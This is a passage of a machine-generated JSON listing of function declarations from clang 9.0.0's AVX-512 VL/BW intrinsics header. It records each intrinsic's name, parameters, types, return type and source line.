"/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2198:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_mov_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2206:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_mov_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2214:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_mov_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2222:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_mov_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2230:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_mov_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2238:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_mov_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2246:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_set1_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2255:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_set1_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2263:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_set1_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2271:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_set1_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2279:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_loadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2287:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_loadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2296:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_loadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2304:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_loadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2313:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_loadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2322:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_loadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2330:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_loadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2339:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_loadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2348:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_loadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2356:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_loadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2365:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_loadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2374:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_loadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2382:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2391:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2400:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2408:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2417:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2425:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2434:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2442:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2451:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_test_epi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2459:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm_mask_test_epi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2465:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm256_test_epi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2472:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm256_mask_test_epi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2479:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm_test_epi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2486:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm_mask_test_epi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2492:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_test_epi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2499:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm256_mask_test_epi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2506:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm_testn_epi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2513:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm_mask_testn_epi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2519:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm256_testn_epi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2526:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm256_mask_testn_epi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2533:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm_testn_epi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2540:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm_mask_testn_epi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2546:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_testn_epi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2552:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm256_mask_testn_epi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2559:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm_movepi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2566:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm256_movepi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2572:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm_movepi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2578:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_movepi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2584:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm_movm_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2590:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_movm_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2596:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_movm_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2602:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_movm_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2608:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_broadcastb_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2614:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_broadcastb_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2622:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_broadcastb_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2630:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_broadcastb_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2638:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_broadcastw_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2646:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_broadcastw_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2654:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_broadcastw_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2662:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_broadcastw_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2670:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_set1_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2678:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_set1_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2686:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_set1_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2694:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_set1_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2702:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_permutexvar_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2710:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_permutexvar_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2716:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_permutexvar_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2724:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_permutexvar_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2733:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_permutexvar_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2739:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_permutexvar_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2748:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], 